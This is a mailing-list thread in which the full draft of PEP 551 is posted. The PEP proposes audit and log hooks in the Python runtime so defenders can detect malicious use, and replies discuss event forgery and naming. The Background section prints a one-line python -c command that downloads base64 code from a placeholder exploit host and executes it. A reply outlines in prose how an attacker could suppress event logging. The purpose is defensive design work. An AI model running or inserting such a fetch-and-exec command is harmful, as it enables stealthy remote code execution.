From steve.dower at python.org  Thu Aug 24 13:13:12 2017
From: steve.dower at python.org (Steve Dower)
Date: Thu, 24 Aug 2017 10:13:12 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python runtime
Message-ID: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>

Hi security-sig,

Those of you who were at the PyCon US language summit this year (or who 
saw the coverage at https://lwn.net/Articles/723823/) may recall that I 
talked briefly about the ways Python is used by attackers to gain and/or 
retain access to systems on local networks.

This comes out of work we've been doing at Microsoft to balance the 
flexibility of scripting languages with their usefulness to malicious 
users. PowerShell in particular has had a lot of work done, and we've 
been doing the same internally for Python. Things like transcripting 
(log every piece of code when it is compiled) and signature validation 
(prevent loading unsigned code).

This PEP is about upstreaming enough functionality to make it easier to 
maintain these features - it is *not* intended to add specific security 
features to the core release. The aim is to be able to use a standard 
libpython3.7/python37.dll with a custom python3.7/python.exe that adds 
those features (listed in the PEP).

Right now parts of the PEP is incomplete. In particular, the 
Recommendations section is much shorter than I intend, the list of log 
hook locations is also too short, and I have only done a preliminary 
performance analysis. But it's time to get reviews of the overall 
concept. I'd also like to take suggestions for more hook locations and 
relevant recommendations, so feel free to throw them out there. In 
particular, I'm not as up to date on best practices for non-Windows 
platforms as the rest of the list, so feel free to correct or improve 
those parts.

Because ReST+max 80 character width makes tables completely unreadable 
in source, I suggest reading it at 
https://github.com/python/peps/blob/master/pep-0551.rst but I've 
included the full text below for quoting purposes.

My current implementation is available at 
https://github.com/zooba/cpython/tree/sectrans and should work on both 
Windows and Linux. I hope to take this to python-dev by next week and 
spend the dev sprints getting the PEP to the point where it can be accepted.

==========================================================

PEP: 551
Title: Security transparency in the Python runtime
Version: $Revision$
Last-Modified: $Date$
Author: Steve Dower <steve.dower at python.org>
Status: Draft
Type: Standards Track
Content-Type: text/x-rst
Created: 23-Aug-2017
Python-Version: 3.7
Post-History:

Abstract
========

This PEP describes additions to the Python API and specific behaviors 
for the
CPython implementation that make actions taken by the Python runtime 
visible to
security and auditing tools. The goals in order of increasing importance 
are to
prevent malicious use of Python, to detect and report on malicious use, 
and most
importantly to detect attempts to bypass detection. Most of the 
responsibility
for implementation is required from users, who must customize and build 
Python
for their own environment.

We propose two small sets of public APIs to enable users to reliably 
build their
copy of Python without having to modify the core runtime, protecting future
maintainability. We also discuss recommendations for users to help them 
develop
and configure their copy of Python.

Background
==========

Software vulnerabilities are generally seen as bugs that enable remote or
elevated code execution. However, in our modern connected world, the more
dangerous vulnerabilities are those that enable advanced persistent threats
(APTs). APTs are achieved when an attacker is able to penetrate a network,
establish their software on one or more machines, and over time extract 
data or
intelligence. Some APTs may make themselves known by maliciously 
damaging data
(e.g., `WannaCrypt 
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/WannaCrypt>`_)
or hardware (e.g., `Stuxnet 
<https://www.microsoft.com/wdsi/threats/malware-encyclopedia-description?name=Win32/Stuxnet>`_).
Most attempt to hide their existence and avoid detection. APTs often use a
combination of traditional vulnerabilities, social engineering, phishing (or
spear-phishing), thorough network analysis, and an understanding of
misconfigured environments to establish themselves and do their work.

The first infected machines may not be the final target and may not require
special privileges. For example, an APT that is established as a
non-administrative user on a developer?s machine may have the ability to 
spread
to production machines through normal deployment channels. It is common 
for APTs
to persist on as many machines as possible, with sheer weight of 
presence making
them difficult to remove completely.

Whether an attacker is seeking to cause direct harm or hide their 
tracks, the
biggest barrier to detection is a lack of insight. System administrators 
with
large networks rely on distributed logs to understand what their 
machines are
doing, but logs are often filtered to show only error conditions. APTs 
that are
attempting to avoid detection will rarely generate errors or abnormal 
events.
Reviewing normal operation logs involves a significant amount of effort, 
though
work is underway by a number of companies to enable automatic anomaly 
detection
within operational logs. The tools preferred by attackers are ones that are
already installed on the target machines, since log messages from these 
tools
are often expected and ignored in normal use.

At this point, we are not going to spend further time discussing the 
existence
of APTs or methods and mitigations that do not apply to this PEP. For 
further
information about the field, we recommend reading or watching the resources
listed under `Further Reading`_.

Python is a particularly interesting tool for attackers due to its 
prevalence on
server and developer machines, its ability to execute arbitrary code 
provided as
data (as opposed to native binaries), and its complete lack of internal 
logging.
This allows attackers to download, decrypt, and execute malicious code 
with a
single command::

     python -c "import urllib.request, base64; 
exec(base64.b64decode(urllib.request.urlopen('http://my-exploit/py.b64')).decode())"

This command currently bypasses most anti-malware scanners that rely on
recognizable code being read through a network connection or being 
written to
disk (base64 is often sufficient to bypass these checks). It also bypasses
protections such as file access control lists or permissions (no file access
occurs), approved application lists (assuming Python has been approved 
for other
uses), and automated auditing or logging (assuming Python is allowed to 
access
the internet or access another machine on the local network from which 
to obtain
its payload).

General consensus among the security community is that totally preventing
attacks is infeasible and defenders should assume that they will often 
detect
attacks only after they have succeeded. This is known as the "assume breach"
mindset. [1]_ In this scenario, protections such as sandboxing and input
validation have already failed, and the important task is detection, 
tracking,
and eventual removal of the malicious code. To this end, the primary feature
required from Python is security transparency: the ability to see what
operations the Python runtime is performing that may indicate anomalous or
malicious use. Preventing such use is valuable, but secondary to the need to
know that it is occurring.

To summarise the goals in order of increasing importance:

* preventing malicious use is valuable
* detecting malicious use is important
* detecting attempts to bypass detection is critical

One example of a scripting engine that has addressed these challenges is
PowerShell, which has recently been enhanced towards similar goals of
transparency and prevention. [2]_

Generally, application and system configuration will determine which events
within a scripting engine are worth logging. However, given the value of 
many
logs events are not recognized until after an attack is detected, it is
important to capture as much as possible and filter views rather than 
filtering
at the source (see the No Easy Breach video from above). Events that are 
always
of interest include attempts to bypass event logging, attempts to load and
execute code that is not correctly signed or access-controlled, use of 
uncommon
operating system functionality such as debugging or inter-process inspection
tools, most network access and DNS resolution, and attempts to create 
and hide
files or configuration settings on the local machine.

To summarize, defenders have a need to audit specific uses of Python in 
order to
detect abnormal or malicious usage. Currently, the Python runtime does not
provide any ability to do this, which (anecdotally) has led to organizations
switching to other languages. The aim of this PEP is to enable system
administrators to deploy a security transparent copy of Python that can
integrate with their existing auditing and protection systems.

On Windows, some specific features that may be enabled by this include:

* Script Block Logging [3]_
* DeviceGuard [4]_
* AMSI [5]_
* Persistent Zone Identifiers [6]_
* Event tracing (which includes event forwarding) [7]_

On Linux, some specific features that may be integrated are:

* gnupg [8]_
* sd_journal [9]_
* OpenBSM [10]_
* syslog [11]_
* check execute bit on imported modules


On macOS, some features that may be used with the expanded APIs are:

* OpenBSM [10]_
* syslog [11]_

Overall, the ability to enable these platform-specific features on 
production
machines is highly appealing to system administrators and will make Python a
more trustworthy dependency for application developers.


Overview of Changes
===================

True security transparency is not fully achievable by Python in 
isolation. The
runtime can log as many events as it likes, but unless the logs are 
reviewed and
analyzed there is no value. Python may impose restrictions in the name of
security, but usability may suffer. Different platforms and environments 
will
require different implementations of certain security features, and
organizations with the resources to fully customize their runtime should be
encouraged to do so.

The aim of these changes is to enable system administrators to integrate 
Python
into their existing security systems, without dictating what those 
systems look
like or how they should behave. We propose two API changes to enable 
this: an
Event Log Hook and Verified Open Hook. Both are not set by default, and both
require modifying the appropriate entry point to enable any 
functionality. For
the purposes of validation and example, we propose a new spython/spython.exe
entry point program that enables some basic functionality using these hooks.
However, the expectation is that security-conscious organizations will 
create
their own entry points to meet their needs.

Event Log Hook
--------------

In order to achieve security transparency, an API is required to raise 
messages
from within certain operations. These operations are typically deep 
within the
Python runtime or standard library, such as dynamic code compilation, module
imports, DNS resolution, or use of certain modules such as ``ctypes``.

The new APIs required for log hooks are::

    # Add a logging hook
    sys.addloghook(hook: Callable[str, tuple]) -> None
    int PySys_AddLogHook(int (*hook)(const char *event, PyObject *args));

    # Raise an event with all logging hooks
    sys.loghook(str, *args) -> None
    int PySys_LogHook(const char *event, PyObject *args);

    # Internal API used during Py_Finalize() - not publicly accessible
    void _Py_ClearLogHooks(void);

Hooks are added by calling ``PySys_AddLogHook()`` from C at any time, 
including
before ``Py_Initialize()``, or by calling ``sys.addloghook()`` from 
Python code.
Hooks are never removed or replaced, and existing hooks have an 
opportunity to
refuse to allow new hooks to be added (adding a logging hook is logged, 
and so
preexisting hooks can raise an exception to block the new addition).

When events of interest are occurring, code can either call 
``PySys_LogHook()``
from C (while the GIL is held) or ``sys.loghook()``. The string argument 
is the
name of the event, and the tuple contains arguments. A given event name 
should
have a fixed schema for arguments, and both arguments are considered a 
public
API (for a given x.y version of Python), and thus should only change between
feature releases with updated documentation.

When an event is logged, each hook is called in the order it was added 
with the
event name and tuple. If any hook returns with an exception set, later 
hooks are
ignored and *in general* the Python runtime should terminate. This is
intentional to allow hook implementations to decide how to respond to any
particular event. The typical responses will be to log the event, abort the
operation with an exception, or to immediately terminate the process with an
operating system exit call.

When an event is logged but no hooks have been set, the ``loghook()`` 
function
should include minimal overhead. Ideally, each argument is a reference to
existing data rather than a value calculated just for the logging call.

As hooks may be Python objects, they need to be freed during 
``Py_Finalize()``.
To do this, we add an internal API ``_Py_ClearLogHooks()`` that releases any
``PyObject*`` hooks that are held, as well as any heap memory used. This 
is an
internal function with no public export, but it passes an event to all 
existing
hooks to ensure that unexpected calls are logged.

See `Log Hook Locations`_ for proposed log hook points and schemas, and the
`Recommendations`_ section for discussion on appropriate responses.

Verified Open Hook
------------------

Most operating systems have a mechanism to distinguish between files 
that can be
executed and those that can not. For example, this may be an execute bit 
in the
permissions field, or a verified hash of the file contents to detect 
potential
code tampering. These are an important security mechanism for preventing
execution of data or code that is not approved for a given environment.
Currently, Python has no way to integrate with these when launching 
scripts or
importing modules.

The new public API for the verified open hook is::

    # Set the handler
    int Py_SetOpenForExecuteHandler(PyObject *(*handler)(const char 
*narrow, const wchar_t *wide))

    # Open a file using the handler
    os.open_for_exec(pathlike)

The ``os.open_for_exec()`` function is a drop-in replacement for
``open(pathlike, 'rb')``. Its default behaviour is to open a file for raw,
binary access - any more restrictive behaviour requires the use of a custom
handler. (Aside: since ``importlib`` requires access to this function 
before the
``os`` module has been imported, it will be available on the 
``nt``/``posix``
modules, but the intent is that other users will access it through the 
``os``
module.)

A custom handler may be set by calling ``Py_SetOpenForExecuteHandler()`` 
from C
at any time, including before ``Py_Initialize()``. When 
``open_for_exec()`` is
called with a handler set, the handler will be passed the processed 
narrow or
wide path, depending on platform, and its return value will be returned
directly. The returned object should be an open file-like object that 
supports
reading raw bytes. This is explicitly intended to allow a ``BytesIO`` 
instance
if the open handler has already had to read the file into memory in order to
perform whatever verification is necessary to determine whether the 
content is
permitted to be executed.

Note that these handlers can import and call the ``_io.open()`` function on
CPython without triggering themselves.

If the handler determines that the file is not suitable for execution, 
it should
raise an exception of its choice, as well as performing any other logging or
notifications.

All import and execution functionality involving code from a file will be
changed to use ``open_for_exec()`` unconditionally. It is important to 
note that
calls to ``compile()``, ``exec()`` and ``eval()`` do not go through this
function - a log hook that includes the code from these calls will be 
added and
is the best opportunity to validate code that is read from the file. 
Given the
current decoupling between import and execution in Python, most imported 
code
will go through both ``open_for_exec()`` and the log hook for 
``compile``, and
so care should be taken to avoid repeating verification steps.

API Availability
----------------

While all the functions added here are considered public and stable API, the
behavior of the functions is implementation specific. The descriptions here
refer to the CPython implementation, and while other implementations should
provide the functions, there is no requirement that they behave the same.

For example, ``sys.addloghook()`` and ``sys.loghook()`` should exist but 
may do
nothing. This allows code to make calls to ``sys.loghook()`` without 
having to
test for existence, but it should not assume that its call will have any 
effect.
(Including existence tests in security-critical code allows another 
vector to
bypass logging, so it is preferable that the function always exist.)

``os.open_for_exec()`` should at a minimum always return 
``_io.open(pathlike,
'rb')``. Code using the function should make no further assumptions 
about what
may occur, and implementations other than CPython are not required to let
developers override the behavior of this function with a hook.


Log Hook Locations
==================

Calls to ``sys.loghook()`` or ``PySys_LogHook()`` will be added to the 
following
operations with the schema in Table 1. Unless otherwise specified, the 
ability
for log hooks to abort any listed operation should be considered part of the
rationale for including the hook.

.. csv-table:: Table 1: Log Hooks
    :header: "API Function", "Event Name", "Arguments", "Rationale"
    :widths: 2, 2, 3, 6

    ``PySys_AddLogHook``, ``sys.addloghook``, "", "Detect when new log 
hooks are
    being added."
    ``_PySys_ClearLogHooks``, ``sys._clearloghooks``, "", "Notifies 
hooks they
    are being cleaned up, mainly in case the event is triggered 
unexpectedly.
    This event cannot be aborted."
    ``Py_SetOpenForExecuteHandler``, ``setopenforexecutehandler``, "", 
"Detects
    any attempt to set the ``open_for_execute`` handler."
    "``compile``, ``exec``, ``eval``, ``PyAst_CompileString``", 
``compile``, "
    ``(code, filename_or_none)``", "Detect dynamic code compilation. 
Note that
    this will also be called for regular imports of source code, 
including those
    that used ``open_for_exec``."
    ``import``, ``import``, "``(module, filename, sys.path, sys.meta_path,
    sys.path_hooks)``", "Detect when modules are imported. This is 
raised before
    the module name is resolved to a file. All arguments other than the 
module
    name may be ``None`` if they are not used or available."
    "``_ctypes.dlopen``, ``_ctypes.LoadLibrary``", ``ctypes.dlopen``, "
    ``(module_or_path,)``", "Detect when native modules are used."
    ``_ctypes._FuncPtr``, ``ctypes.dlsym``, "``(lib_object, name)``", 
"Collect
    information about specific symbols retrieved from native modules."
    ``_ctypes._CData``, ``ctypes.cdata``, "``(ptr_as_int,)``", "Detect 
when code
    is accessing arbitrary memory using ``ctypes``"
    ``id``, ``id``, "``(id_as_int,)``", "Detect when code is accessing 
the id of
    objects, which in CPython reveals information about memory layout."
    ``sys._getframe``, ``sys._getframe``, "``(frame_object,)``", "Detect 
when
    code is accessing frames directly"
    ``sys._current_frames``, ``sys._current_frames``, "", "Detect when 
code is
    accessing frames directly"
    ``PyEval_SetProfile``, ``sys.setprofile``, "", "Detect when code is 
injecting
    trace functions. Because of the implementation, exceptions raised 
from the
    hook will abort the operation, but will not be raised in Python 
code. Note
    that ``threading.setprofile`` eventually calls this function, so the 
event
    will be logged for each thread."
    ``PyEval_SetTrace``, ``sys.settrace``, "", "Detect when code is 
injecting
    trace functions. Because of the implementation, exceptions raised 
from the
    hook will abort the operation, but will not be raised in Python 
code. Note
    that ``threading.settrace`` eventually calls this function, so the event
    will be logged for each thread."
    ``_PyEval_SetAsyncGenFirstiter``, ``sys.set_async_gen_firstiter``, "", "
    Detect changes to async generator hooks."
    ``_PyEval_SetAsyncGenFinalizer``, ``sys.set_async_gen_finalizer``, "", "
    Detect changes to async generator hooks."
    ``_PyEval_SetCoroutineWrapper``, ``sys.set_coroutine_wrapper``, "", 
"Detect
    changes to the coroutine wrapper."
    ``Py_SetRecursionLimit``, ``sys.setrecursionlimit``, 
"``(new_limit,)``", "
    Detect changes to the recursion limit."
    ``_PyEval_SetSwitchInterval``, ``sys.setswitchinterval``, 
"``(interval_us,)``
    ", "Detect changes to the switching interval."
    "``socket.bind``, ``socket.connect``, ``socket.connect_ex``,
    ``socket.sendmsg``, ``socket.sendto``", ``socket.address``, 
"``(address,)``
    ", "Detect access to network resources. The address is unmodified 
from the
    original call."
    ``socket.__init__``, "socket()", "``(family, type, proto)``", "Detect
    creation of sockets. The arguments will be int values."
    ``socket.gethostname``, ``socket.gethostname``, "", "Detect attempts to
    retrieve the current host name."
    ``socket.sethostname``, ``socket.sethostname``, "``(name,)``", "Detect
    attempts to change the current host name. The name argument is 
passed as a
    bytes object."
    "``socket.gethostbyname``, ``socket.gethostbyname_ex``", "
    ``socket.gethostbyname``", "``(name,)``", "Detect host name 
resolution. The
    name argument is a str or bytes object."
    ``socket.gethostbyaddr``, ``socket.gethostbyaddr``, 
"``(address,)``", "Detect
    host resolution. The address argument is a str or bytes object."
    ``socket.getservbyname``, ``socket.getservbyname``, "``(name, 
protocol)``", "
    Detect service resolution. The arguments are str objects."
    ``socket.getservbyport``, ``socket.getservbyport``, "``(port, 
protocol)``", "
    Detect service resolution. The port argument is an int and protocol is a
    str."

TODO - more hooks in ``_socket``, ``_ssl``, others?


SPython Entry Point
===================

A new entry point binary will be added, called ``spython.exe`` on 
Windows and
``spythonX.Y`` on other platforms. This entry point is intended 
primarily as an
example, as we expect most users of this functionality to implement 
their own
entry point and hooks (see `Recommendations`_). It will also be used for 
tests.

Source builds will create ``spython`` by default, but distributors may 
choose
whether to include ``spython`` in their pre-built packages. The python.org
managed binary distributions will not include ``spython``.

**Do not accept most command-line arguments**

The ``spython`` entry point requires a script file be passed as the first
argument, and does not allow any options. This prevents arbitrary code 
execution
from in-memory data or non-script files (such as pickles, which can be 
executed
using ``-m pickle <path>``.

Options ``-B`` (do not write bytecode), ``-E`` (ignore environment 
variables)
and ``-s`` (no user site) are assumed.

If a file with the same full path as the process with a ``._pth`` suffix
(``spython._pth`` on Windows, ``spythonX.Y._pth`` on Linux) exists, it 
will be
used to initialize ``sys.path`` following the rules currently described `for
Windows <https://docs.python.org/3/using/windows.html#finding-modules>`_.

**Log security events to a file**

Before initialization, ``spython`` will set a log hook that writes 
events to a
local file. By default, this file is the full path of the process with a
``.log`` suffix, but may be overridden with the ``SPYTHONLOG`` environment
variable (despite such overrides being explicitly discouraged in
`Recommendations`_).

The log hook will also abort all ``addloghook`` events, preventing any other
hooks from being added.

On Windows, code from ``compile`` events will submitted to AMSI [5]_ and 
if it
fails to validate, the compile event will be aborted. This can be tested by
calling ``compile()`` or ``eval()`` on the contents of the `EICAR test file
<http://www.eicar.org/86-0-Intended-use.html>`_.

**Restrict importable modules**

Also before initialization, ``spython`` will set an open-for-execute 
hook that
validates all files opened with ``os.open_for_exec``. This 
implementation will
require all files to have a ``.py`` suffix (thereby blocking the use of 
cached
bytecode), and will raise a custom log message ``spython.open_for_exec``
containing ``(filename, True_if_allowed)``.

On Windows, the hook will also open the file with flags that prevent any 
other
process from opening it with write access, which allows the hook to perform
additional validation on the contents with confidence that it will not be
modified between the check and use. Compilation will later trigger a 
``compile``
event, so there is no need to read the contents now for AMSI, but other
validation mechanisms such as DeviceGuard [4]_ should be performed here.


Performance Impact
==================

**TODO**

Full impact analysis still requires investigation. Preliminary testing shows
that calling ``sys.loghook`` with no hooks added does not significantly 
affect
any existing benchmarks, though targeted microbenchmarks can observe an 
impact.

Performance impact using ``spython`` or with hooks added are not of interest
here, since this is considered opt-in functionality.


Recommendations
===============

Specific recommendations are difficult to make, as the ideal 
configuration for any environment will depend on the user's ability to 
manage, monitor, and respond to activity on their own network. However, 
many of the proposals here do not appear to be of value without deeper 
illustration. This section provides recommendations using the terms 
**should** (or **should not**), indicating that we consider it dangerous 
to ignore the advice, and **may**, indicating that for the advice ought 
to be considered for high value systems. The term **sysadmins** refers 
to whoever is responsible for deploying Python throughout your network, 
though different organizations may have different titles for the 
relevant person.

Sysadmins **should** build their own entry point, likely starting from 
``spython``, and directly interface with the security systems available 
in their environment. The more tightly integrated, the less likely a 
vulnerability will be found allowing an attacker to bypass those 
systems. In particular, the entry point **should not** obtain any 
settings from the current environment, such as environment variables, 
unless those settings are otherwise protected from modification.

The default ``python`` entry point **should not** be deployed to 
production machines, but could be given to developers to use and test 
Python on non-production machines. Sysadmins **may** consider deploying 
a less restrictive version of their entry point to developer machines, 
since any system connected to your network is a potential target.

Python deployments **should** be made read-only using any available 
platform functionality after deployment and during use.

On platforms that support it, sysadmins **should** include signatures 
for every file in a Python deployment, ideally verified using a private 
certificate. For example, Windows supports embedding signatures in 
executable files and using catalogs for others, and can use DeviceGuard 
[4]_ to validate signatures either automatically or using an 
``open_for_exec`` hook.

Sysadmins **should** collect as many logged events as possible, and 
**should** copy them off of local machines frequently. Even if logs are 
not being constantly monitored for suspicious activity, once an attack 
is detected it is too late to enable logging. Log hooks **should not** 
attempt to preemptively filter events, as even benign events are useful 
when analyzing the progress of an attack. (Watch the "No Easy Breach" 
video under `Further Reading`_ for a deeper look at this side of things.)

Log hooks **should** write events to logs before attempting to abort. As 
discussed earlier, it is more important to record malicious actions than 
to prevent them. Very few actions should be aborted, as most will occur 
during normal use. Sysadmins **may** audit their Python code and abort 
operations that are known to never be used deliberately.

On production machines, the first log hook **should** be set in C code 
before ``Py_Initialize`` is called, and that hook **should** 
unconditionally abort the ``sys.addloghook`` event. The Python interface 
is mainly useful for testing.

On production machines, a non-validating ``open_for_exec`` hook **may** 
be set in C code before ``Py_Initialize`` is called. This prevents later 
code from overriding the hook, however, logging the 
``setopenforexecutehandler`` event is useful since no code should ever 
need to call it. Using at least the sample ``open_for_exec`` hook 
implementation from ``spython`` is recommended.

[TODO: more good advice; less bad advice]

Further Reading
===============


**Redefining Malware: When Old Terms Pose New Threats**
     By Aviv Raff for SecurityWeek, 29th January 2014

     This article, and those linked by it, are high-level summaries of 
the rise of
     APTs and the differences from "traditional" malware.

 
`<http://www.securityweek.com/redefining-malware-when-old-terms-pose-new-threats>`_

**Anatomy of a Cyber Attack**
     By FireEye, accessed 23rd August 2017

     A summary of the techniques used by APTs, and links to a number of 
relevant
     whitepapers.

 
`<https://www.fireeye.com/current-threats/anatomy-of-a-cyber-attack.html>`_

**Automated Traffic Log Analysis: A Must Have for Advanced Threat 
Protection**
     By Aviv Raff for SecurityWeek, 8th May 2014

     High-level summary of the value of detailed logging and automatic 
analysis.

 
`<http://www.securityweek.com/automated-traffic-log-analysis-must-have-advanced-threat-protection>`_

**No Easy Breach: Challenges and Lessons Learned from an Epic 
Investigation**
     Video presented by Matt Dunwoody and Nick Carr for Mandiant at 
SchmooCon 2016

     Detailed walkthrough of the processes and tools used in detecting 
and removing
     an APT.

     `<https://archive.org/details/No_Easy_Breach>`_

**Disrupting Nation State Hackers**
     Video presented by Rob Joyce for the NSA at USENIX Enigma 2016

     Good security practices, capabilities and recommendations from the 
chief of
     NSA's Tailored Access Operation.

     `<https://www.youtube.com/watch?v=bDJb8WOJYdA>`_

References
==========

.. [1] Assume Breach Mindset, `<http://asian-power.com/node/11144>`_

.. [2] PowerShell Loves the Blue Team, also known as Scripting Security and
    Protection Advances in Windows 10, 
`<https://blogs.msdn.microsoft.com/powershell/2015/06/09/powershell-the-blue-team/>`_

.. [3] 
`<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>`_

.. [4] `<https://aka.ms/deviceguard>`_

.. [5] AMSI, 
`<https://msdn.microsoft.com/en-us/library/windows/desktop/dn889587(v=vs.85).aspx>`_

.. [6] Persistent Zone Identifiers, 
`<https://msdn.microsoft.com/en-us/library/ms537021(v=vs.85).aspx>`_

.. [7] Event tracing, 
`<https://msdn.microsoft.com/en-us/library/aa363668(v=vs.85).aspx>`_

.. [8] `<https://www.gnupg.org/>`_

.. [9] `<https://www.systutorials.com/docs/linux/man/3-sd_journal_send/>`_

.. [10] `<http://www.trustedbsd.org/openbsm.html>`_

.. [11] `<https://linux.die.net/man/3/syslog>`_

Acknowledgments
===============

Thanks to all the people from Microsoft involved in helping make the Python
runtime safer for production use, and especially to James Powell for 
doing much
of the initial research, analysis and implementation, Lee Holmes for 
invaluable
insights into the info-sec field and PowerShell's responses, and Brett 
Cannon
for the grounding discussions.

Copyright
=========

Copyright (c) 2017 by Microsoft Corporation. This material may be 
distributed
only subject to the terms and conditions set forth in the Open Publication
License, v1.0 or later (the latest version is presently available at
http://www.opencontent.org/openpub/).

From njs at pobox.com  Thu Aug 24 14:16:44 2017
From: njs at pobox.com (Nathaniel Smith)
Date: Thu, 24 Aug 2017 11:16:44 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
Message-ID: <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>

I don't have any particular security expertise, but a few thoughts anyway...

- your big list of logged events seems to be missing
getaddrinfo/getnameinfo (the modern replacements for get*by*)

- you make it possible for arbitrary code to log arbitrary events by
calling sys.loghook, which seems useful if you want to allow e.g. cffi to
log similar events to the ones that ctypes logs. But are you worried that
attackers could use the ability to forge arbitrary events to cover their
trail?

- the name "spython" makes me nervous, because I feel like as soon as
discussion switches from specifics like "transparency through event
logging" to vague abstractions like "secure", then it becomes much more
difficult to have useful discussions. Like, we're inevitably going to have
people trying to use 'spython' to replace their normal python 'because it's
more secure' and stuff like that. Would it make sense to call it something
else, like 'tpython' (for 'transparent'), or 'stdemo-python' (to emphasize
that it's more intended as an example and starting point rather than a
useful product)?

-n
-------------- next part --------------
An HTML attachment was scrubbed...
URL: <http://mail.python.org/pipermail/security-sig/attachments/20170824/14ad6091/attachment.html>

From barry at python.org  Thu Aug 24 14:46:55 2017
From: barry at python.org (Barry Warsaw)
Date: Thu, 24 Aug 2017 14:46:55 -0400
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>
Message-ID: <DEC9E356-6576-4E8F-A28F-9FB874252DEB@python.org>

On Aug 24, 2017, at 14:16, Nathaniel Smith <njs at pobox.com> wrote:
> 
> - the name "spython" makes me nervous, because I feel like as soon as discussion switches from specifics like "transparency through event logging" to vague abstractions like "secure", then it becomes much more difficult to have useful discussions. Like, we're inevitably going to have people trying to use 'spython' to replace their normal python 'because it's more secure' and stuff like that. Would it make sense to call it something else, like 'tpython' (for 'transparent'), or 'stdemo-python' (to emphasize that it's more intended as an example and starting point rather than a useful product)?

It makes me a little uncomfortable too because there has been several discussions over the years amongst Linux distros about an `spython` meaning ?system Python?.  Essentially that would be an entry point that you couldn?t install stuff into, and thus couldn?t accidentally break your distro (for those Linux distros that have vital functionality implemented in Python).

We could certainly bikeshed on this, but ultimately I think we?ll want to make the actual entry point name emitted from the build process to be configurable.

-Barry

-------------- next part --------------
A non-text attachment was scrubbed...
Name: signature.asc
Type: application/pgp-signature
Size: 833 bytes
Desc: Message signed with OpenPGP
URL: <http://mail.python.org/pipermail/security-sig/attachments/20170824/830d45d3/attachment.sig>

From steve.dower at python.org  Thu Aug 24 14:52:29 2017
From: steve.dower at python.org (Steve Dower)
Date: Thu, 24 Aug 2017 11:52:29 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>
Message-ID: <4deb1b45-69dd-a0f3-a41a-555dbbd442dd@python.org>

On 24Aug2017 1116, Nathaniel Smith wrote:
> I don't have any particular security expertise, but a few thoughts anyway...

Glad to hear them!

> - your big list of logged events seems to be missing
> getaddrinfo/getnameinfo (the modern replacements for get*by*)

Indeed, added! They'll be in the next update.

> - you make it possible for arbitrary code to log arbitrary events by
> calling sys.loghook, which seems useful if you want to allow e.g. cffi
> to log similar events to the ones that ctypes logs. But are you worried
> that attackers could use the ability to forge arbitrary events to cover
> their trail?

I raised this question with some of our defenders and they don't think 
it's a serious concern, especially since an attacker could "forge" real 
events by taking the action and ignoring the result.

For example, a lot of malware will use DNS resolution as a kill-switch. 
When a name stops resolving (or when it starts resolving), it wipes 
itself. The attacker could attempt to DoS the log analysis by resolving 
hundreds of randomly generated names, thereby letting defenders know 
that *something* is going on, but making it really hard to figure out 
exactly what is going on.

It's thought unlikely that malicious code would reduce the number of 
events compared to normal operation, so any increase - real or forged - 
is an indication of a problem. About the only valid use case I can come 
up with for forging events is when an attacker suppresses all events but 
wants things to continue to look normal, and it's much easier to do this by:

* infect normal running process and suppress all events
* spawn undetected subprocess and suppress all its events
* crash the original process and let the host restart it automatically 
(very likely on a running server)
* do all your work in the subprocess that nobody expects to see messages 
from anyway

Basically, when weighed against the ability for libraries like cffi and 
pywin32 to add their own contributions to the log, it is worth the risk 
to allow extra messages.

(And let me know if you think this explanation is important to have in 
the PEP text somewhere.)

> - the name "spython" makes me nervous, because I feel like as soon as
> discussion switches from specifics like "transparency through event
> logging" to vague abstractions like "secure", then it becomes much more
> difficult to have useful discussions. Like, we're inevitably going to
> have people trying to use 'spython' to replace their normal python
> 'because it's more secure' and stuff like that. Would it make sense to
> call it something else, like 'tpython' (for 'transparent'), or
> 'stdemo-python' (to emphasize that it's more intended as an example and
> starting point rather than a useful product)?

Who said "secure"? :) Given the lack of command-line arguments and 
interactive mode, "stupid" is the more likely interpretation of the 's' 
(though I also liked the suggestion that it's for "spy-thon", since we 
can spy on what it's doing).

The most likely true meaning is "system" - many of the people involved 
in the Linux distros have been talking about having a separate system 
Python for their tools that is not exposed to users, and part of the 
intent of this entry point is to fulfill that need. Whether it will or 
not is an open question, but I'm keen to adapt this part of the PEP to 
be most useful to distributors, since the point of it is to be the 
starting point of the exact entry point they need. (And also to be able 
to test some of the features in the test suite.)

Cheers,
Steve


From steve.dower at python.org  Thu Aug 24 16:01:56 2017
From: steve.dower at python.org (Steve Dower)
Date: Thu, 24 Aug 2017 13:01:56 -0700
Subject: [Security-sig] PEP 551: Security transparency in the Python
 runtime
In-Reply-To: <A1E65B87-2C1C-47D1-8BEC-C51B6E7A46D1@dontusethiscode.com>
References: <ef0793c8-8a95-3807-a5d9-fa95c58e731d@python.org>
 <CAPJVwB=UP-Ukaj7H5Csk2WfwzNu4HdcV6XaKhY09C=CY40N-Xg@mail.gmail.com>
 <4deb1b45-69dd-a0f3-a41a-555dbbd442dd@python.org>
 <A1E65B87-2C1C-47D1-8BEC-C51B6E7A46D1@dontusethiscode.com>
Message-ID: <ff24b811-192e-a53f-1b31-2e511df2da58@python.org>

On 24Aug2017 1241, James Powell wrote:
>
>>> Like, we're inevitably going to
